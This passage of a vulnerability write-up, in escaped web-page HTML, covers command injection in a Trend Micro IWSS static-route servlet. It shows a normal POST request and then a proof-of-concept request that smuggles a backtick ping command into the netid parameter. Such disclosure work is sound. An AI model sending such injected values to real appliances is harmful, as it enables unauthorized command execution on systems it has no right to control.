elevated functions.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-592defe3ec9ff177076843\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/servlet\/com.trend.iwss.gui.servlet.ManageSRouteSettings?action=add HTTP\/1.1  Host: 192.168.254.176:8443  User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Referer: https:\/\/192.168.254.176:8443\/staticRouteEdit.jsp?action=add  Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D  Connection: close  Content-Type: application\/x-www-form-urlencoded  Content-Length: 259    CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&amp;op=sroutemanage&amp;fromurl=%2  FstaticRoutes.jsp&amp;failoverurl=%2FstaticRouteEdit.jsp&amp;port=&amp;oldnetid=&amp;oldrouter=&amp;oldnetmask=&amp;  oldport=&amp;netid=192.168.1.0&amp;netmask=255.255.255.0&amp;router=192.168.1.1&amp;interface_vlanid_sel=eth1<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9ff177076843-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9ff177076843-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9ff177076843-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9ff177076843-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9ff177076843-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9ff177076843-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9ff177076843-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9ff177076843-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9ff177076843-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9ff177076843-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9ff177076843-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9ff177076843-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3ec9ff177076843-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3ec9ff177076843-14\">14<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9ff177076843-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">servlet<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">com<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">trend<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">iwss<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">gui<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">servlet<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ManageSRouteSettings<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">add <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9ff177076843-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.254.176<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">8443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9ff177076843-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">X11<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Linux <\/span><span class=\"crayon-v\">x86_64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">45.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">45.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9ff177076843-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9ff177076843-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9ff177076843-6\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/192.168.254.176:8443\/staticRouteEdit.jsp?action=add<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9ff177076843-7\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">2930898FD09512142C1B26C71D24466D<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9ff177076843-8\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9ff177076843-9\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">urlencoded<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9ff177076843-10\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">259<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9ff177076843-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9ff177076843-12\"><span class=\"crayon-v\">CSRFGuardToken<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">op<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">sroutemanage<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">fromurl<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3ec9ff177076843-13\"><span class=\"crayon-v\">FstaticRoutes<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">failoverurl<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2FstaticRouteEdit.jsp<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">oldnetid<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">oldrouter<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">oldnetmask<\/span><span class=\"crayon-o\">=&amp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3ec9ff177076843-14\"><span class=\"crayon-v\">oldport<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">netid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">192.168.1.0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">netmask<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">255.255.255.0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">router<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">interface_vlanid_sel<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">eth1<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0055 seconds] -->  <\/p>\n<p>In the above POST request, we can see the page has several parameters that are vulnerable and that we can inject malicious parameters through them: netid, netmask, router, and interface_vlanid_sel<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-592defe3eca04492073175\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/servlet\/com.trend.iwss.gui.servlet.ManageSRouteSettings?action=add HTTP\/1.1  Host: 192.168.254.176:8443  User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Referer: https:\/\/192.168.254.176:8443\/staticRouteEdit.jsp?action=add  Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D  Connection: close  Content-Type: application\/x-www-form-urlencoded  Content-Length: 259    CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&amp;op=sroutemanage&amp;fromurl=%2  FstaticRoutes.jsp&amp;failoverurl=%2FstaticRouteEdit.jsp&amp;port=&amp;oldnetid=&amp;oldrouter=&amp;oldnetmask=&amp;  oldport=&amp;netid=192.168.1.0%7c%7c%60ping%20-  c%2021%20127.0.0.1%60%20%23&#8217;%7c%7c%60ping%20-  c%2021%20127.0.0.1%60%20%23%5c%22%20&amp;netmask=255.255.255.0&amp;router=192.168.1.1&amp;inte  rface_vlanid_sel=eth1<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-592defe3eca04492073175-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3eca04492073175-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3eca04492073175-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3eca04492073175-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3eca04492073175-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3eca04492073175-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3eca04492073175-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3eca04492073175-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3eca04492073175-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3eca04492073175-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3eca04492073175-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3eca04492073175-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3eca04492073175-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3eca04492073175-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3eca04492073175-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-592defe3eca04492073175-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-592defe3eca04492073175-17\">17<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-592defe3eca04492073175-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">servlet<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">com<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">trend<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">iwss<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">gui<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">servlet<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ManageSRouteSettings<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">add <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3eca04492073175-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.254.176<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">8443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3eca04492073175-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">X11<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Linux <\/span><span class=\"crayon-v\">x86_64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">45.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">45.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3eca04492073175-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3eca04492073175-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3eca04492073175-6\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/192.168.254.176:8443\/staticRouteEdit.jsp?action=add<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3eca04492073175-7\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">2930898FD09512142C1B26C71D24466D<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3eca04492073175-8\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3eca04492073175-9\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">urlencoded<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3eca04492073175-10\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">259<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3eca04492073175-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3eca04492073175-12\"><span class=\"crayon-v\">CSRFGuardToken<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">op<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">sroutemanage<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">fromurl<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3eca04492073175-13\"><span class=\"crayon-v\">FstaticRoutes<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">failoverurl<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2FstaticRouteEdit.jsp<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">oldnetid<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">oldrouter<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">oldnetmask<\/span><span class=\"crayon-o\">=&amp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3eca04492073175-14\"><span class=\"crayon-v\">oldport<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">netid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">192.168.1.0<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">7c<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">7c<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">60ping<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3eca04492073175-15\"><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2021<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">20127.0.0.1<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">60<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">23<\/span>&#8216;<span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">7c<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">7c<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">60ping<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-592defe3eca04492073175-16\"><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2021<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">20127.0.0.1<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">60<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">23<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">5c<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">22<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">netmask<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">255.255.255.0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">router<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-e\">inte<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-592defe3eca04492073175-17\"><span class=\"crayon-v\">rface_vlanid_sel<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">eth1<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0067 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\"><img decoding=\"async\" 